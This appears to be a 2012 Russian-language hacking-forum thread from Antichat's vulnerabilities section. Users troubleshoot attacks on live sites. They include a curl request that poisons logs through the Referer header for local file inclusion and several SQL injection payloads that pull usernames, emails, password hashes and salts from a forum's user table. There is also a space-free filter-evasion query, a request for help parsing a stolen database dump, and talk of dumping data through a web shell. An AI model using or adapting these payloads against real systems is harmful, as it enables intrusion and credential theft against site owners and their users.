HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.03.2012, 12:59
Zahar
Новичок
Регистрация: 17.03.2008
Сообщений: 5
Провел на форуме:
168509

Репутация: 1
По умолчанию

LFI

Камрады помогите советом.

Есть LFI, нащупал только лги ошибок, отсылаю запрос с кодом курлом:

Код HTML:
curl http://www.domain.org/nopages1.php --referer "http://go"
В логе режет конструкцию

[PHP]
[COLOR="#000000"][COLOR="#007700"]
 
Ответить с цитированием

  #2  
Старый 13.03.2012, 13:15
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Faaax, нужен запрос без плюсов, /**/ и остальных знаков, обойтись только скобками
 
Ответить с цитированием

  #3  
Старый 13.03.2012, 13:21
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от Faaax  
тогда нужно сделать так
&messagegroupid[0]=3) UNION
(
SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt )
)
FROM user WHERE userid=1
Что за бред ты написал... У него остается закрывающая скобка в конце запроса, что и вызывает ошибку. Остается она потому что он поставил закрывающую после тройки, чем самым нарушил логику.
 
Ответить с цитированием

  #4  
Старый 13.03.2012, 13:22
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

DronS,

ты забыл комментарий после запроса:

Цитата:
Сообщение от None  
&messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1
--+f
 
Ответить с цитированием

  #5  
Старый 13.03.2012, 13:27
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Ну можно и комментарий)
 
Ответить с цитированием

  #6  
Старый 13.03.2012, 14:21
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Есть дамп БД, необходимо некоторые данные привести в другой вид.

Первоначально:

Цитата:
Сообщение от None  
`users` (`id`, `username`, `password`, `salt`, ....
Необходимо вырвать данные из определённых колонок, а именно: username:password:salt

Подскажите, чем лучше это сделать?

P.S. Вручную не предлагать.
 
Ответить с цитированием

  #7  
Старый 13.03.2012, 14:25
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363

Репутация: 11
По умолчанию

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)

так тут у тебя ни одного пробела нету

gl0w,это не бред

если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!
 
Ответить с цитированием

  #8  
Старый 13.03.2012, 14:36
DronS
Новичок
Регистрация: 14.07.2011
Сообщений: 10
Провел на форуме:
2205

Репутация: 0
По умолчанию

Цитата:
Сообщение от Faaax  
gl0w,это не бред
если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!
Все правильно он подсказал. Ты ответ БД читал до конца?)

Код:
WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt  ) FROM user WHERE userid=1);
2gl0w спасибо, запрос корректен теперь

2Ereee с коментарием тоже нормуль идет
 
Ответить с цитированием

  #9  
Старый 13.03.2012, 16:41
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Faaax =\

union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)

так видно?
 
Ответить с цитированием

  #10  
Старый 13.03.2012, 17:09
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

mix0x0,

у тебя есть шелл на сайте? Можно отдельно колонки сдампить. Есть спец. версия by Boolean. На рдоте поищи.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.